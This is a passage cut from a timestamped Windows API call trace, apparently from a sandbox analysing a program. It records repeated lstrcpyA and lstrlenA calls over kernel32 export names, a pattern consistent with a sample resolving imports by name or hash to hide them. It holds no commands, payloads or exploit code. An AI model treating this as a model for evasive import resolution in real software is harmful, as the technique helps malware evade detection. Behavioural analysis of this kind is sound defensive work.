lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.278] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.278] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.278] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.278] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.278] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.279] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.279] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.279] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.279] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.279] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.279] lstrlenA (lpString="CANCELIO") returned 8 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.279] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.279] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.279] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.279] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.279] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.279] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.279] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.279] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.279] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.279] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.279] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.279] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.279] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.280] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.280] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.280] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.280] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.280] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.280] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.280] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.280] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.280] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.280] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.280] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.280] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.280] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.280] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.281] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.281] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.281] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.281] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.281] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.281] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.281] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.281] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.281] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.281] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.281] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.281] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.281] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.281] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.281] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.281] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.281] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.281] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.281] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.282] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.282] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.282] lstrlenA (lpString="COPYFILEA") returned 9 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.282] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.282] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.282] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.282] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.282] lstrlenA (lpString="COPYFILEW") returned 9 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.282] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.282] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.282] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.282] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.282] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.282] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.282] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.282] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.282] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.282] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.282] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.283] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.283] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.283] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.283] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.283] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.283] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.283] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.283] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.283] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.283] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.283] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.283] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.283] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.283] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.283] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.283] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.283] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.283] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.283] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.284] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.284] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.284] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.284] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.284] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.284] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.284] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.284] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.284] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.284] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.284] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.284] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.284] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.284] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.284] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.284] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.284] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.284] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.284] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.285] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.285] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.285] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.285] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.285] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.285] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.285] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.285] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.285] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.285] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.285] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.285] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.285] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.285] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.285] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.285] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.285] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.285] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.285] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.286] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.286] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.286] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.286] lstrlenA 